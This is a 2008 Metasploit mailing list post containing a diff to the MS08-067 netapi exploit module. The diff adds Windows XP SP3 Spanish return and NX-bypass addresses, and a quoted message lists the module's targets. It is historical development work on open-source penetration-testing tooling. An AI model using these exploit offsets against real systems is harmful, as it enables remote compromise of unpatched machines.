Metasploit mailing list archives

MS08-067 added to SVN trunk (3.2-testing)


From: ulises2k at gmail.com (Ulises2k)
Date: Fri, 31 Oct 2008 09:36:25 -0200

I'm sorry, but my patch is for Windows XP SP3 Spanish.
Remember this mail:?
http://spool.metasploit.com/pipermail/framework/2008-October/003724.html

I send you my patch for svn rev. 5814

Thank you


--- ms08_067_netapi.rb  2008-10-31 09:27:22.000000000 -0200
+++ ms08_067_netapi.rb.new      2008-10-31 09:26:48.000000000 -0200
@@ -115,18 +115,6 @@
                                                        'Scratch'   =>
0x00020408,
                                                }
                                        ], # JMP ESI ACGENRAL.DLL,
NX/NX BYPASS ACGENRAL.DLL
-
-                                       #
-                                       # Metasploit's NX bypass for XP SP2/SP3
-                                       # Target provided by Ulises2k
<ulises2k[at]gmail.com>
-                                       #
-                                       [ 'Windows XP SP2 Spanish (NX)',
-                                               {
-                                                       'Ret'       =>
0x6fdbf807,
-                                                       'DisableNX' =>
0x6fdc17c2,
-                                                       'Scratch'   =>
0x00020408,
-                                               }
-                                       ], # JMP ESI ACGENRAL.DLL,
NX/NX BYPASS ACGENRAL.DLL

                                        #
                                        # Metasploit's NX bypass for XP SP2/SP3
@@ -162,7 +150,19 @@
                                                        'Scratch'   =>
0x00020408,
                                                }
                                        ], # JMP ESI ACGENRAL.DLL,
NX/NX BYPASS ACGENRAL.DLL
-
+
+                                       #
+                                       # Metasploit's NX bypass for XP SP3
+                                       # Target provided by Ulises2k
<ulises2k[at]gmail.com>
+                                       #
+                                       [ 'Windows XP SP3 Spanish (NX)',
+                                               {
+                                                       'Ret'       =>
0x6fdbf807,
+                                                       'DisableNX' =>
0x6fdc17c2,
+                                                       'Scratch'   =>
0x00020408,
+                                               }
+                                       ], # CALL ESI ACGENRAL.DLL,
NX/NX BYPASS ACGENRAL.DLL
+
                                        #
                                        # Standard return-to-ESI
without NX bypass
                                        #


--
Ulises U. Cu??
Web: http://www.ulises2k.com.ar


On Fri, Oct 31, 2008 at 03:16, H D Moore <hdm at metasploit.com> wrote:

New targets:

  0   Windows 2000 MS06-040+ (YMMV pre MS06-040)
  1   Windows XP SP2 English (NX)
  2   Windows XP SP2 Italian (NX)
  3   Windows XP SP2 Spanish (NX)
  4   Windows XP SP2 Chinese (NX)
  5   Windows XP SP3 English (NX)
  6   Windows XP SP3 German (NX)
  7   Windows 2003 SP0 English (NO NX)
  8   Windows 2003 SP2 English (NO NX)
  9   Windows 2003 SP2 English (NX)

This list incorporates all of the new targets sent in by list members as
well as Brett Moore's NX bypass method for Windows 2003 SP2 and Antoine's
Windows 2000 near-universal. Thanks again and please send in the ret/nx
addresses for any of the missing targets (SP3 chinese,spanish,italian),
(SP2 german).

-HD
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework



Current thread: